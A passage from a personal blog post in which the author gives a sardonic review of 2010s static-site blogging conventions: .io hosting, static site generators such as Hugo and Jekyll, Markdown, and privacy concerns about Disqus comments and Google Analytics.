This is no way to live. And so, as is typical, the tech community decided that what is old is new again, and that static sites were actually a good idea that should never have been abandoned. Rolling my eyes so hard I went temporarily blind, I actually resisted even caring about the cool way to blog in the 2010s. I used LiveJournal for a bit. I tried a hosted Wordpress (Wordpress.com) account to blog about game console emulators. I got into using Tumblr, even though (or maybe because) the tech community is not on there. But now I’ve decided to give a fresh look at what’s fresh, and give it a chance.

Here are some things I noticed about the current Preferred Way for Cool Kids to Blog.

  • If you write any kind of code for a living, you host it on a free hosting service in the .io TLD. This is just what is fashionable, and like all fashion choices, it can’t really be explained. “Everyone is doing it”, including this blog. We are not all hosting sites in the British Indian Ocean Territory, but yes, this TLD exists because the UK stole some Pacific Islanders’ land during the Cold War, and its only other claim to fame might be its black site CIA torture prison. How’s that for oblivious Silicon Valley tech privilege!
  • Because HTML, JS, and CSS are nearly impossible to work in directly anymore (much like assembly code), people write their web page content in a highly simplified markup language, and then run that through a compiler (oh, sorry, static site generator) to produce a web site in actual HTML, JS, and CSS. The output is then posted to a web hosting service. There are some 450 static site generators to choose from. This site uses Hugo, which I’ll talk about in a future post. An even more popular choice is Jekyll, which is fine…for me to poop on.
  • The simplified markup language of choice currently is Markdown, which will also be the subject of a future post because it is pretty neat.
  • Because supporting the ability for visitors to post comments would require a dynamic site, static sites have outsourced this responsibility to third-party services. That is, comments are implemented with an embedded JavaScript element that is loaded from a remote service. The dominant choice of service at the moment is Disqus. This and any other user-account-based service that embeds its content on your blog is a privacy problem: it means Disqus is basically assigning you an identifier and following you around to all of the Disqus-enabled sites you visit. Ghostery blocks Disqus by default, for this reason. I suggest using Twitter to reach me if you have a comment.
  • Because static sites cannot track how many visitors they get and where they visited from, that too has been outsourced. Google Analytics is now more prevalent than HPV and herpes combined. I have had to delete it out of every web-related code repository that I have borrowed to make anything. Even if I’m the last one on Earth who cares about privacy, I will not be including that here. The same goes for social media sharing links. You’re a big boy and/or girl, I bet you’ll figure out how to share a URL yourself!

So there you have it, my take on the Way to Blog in the 2010s for Cool Kids. Thanks for reading. – MM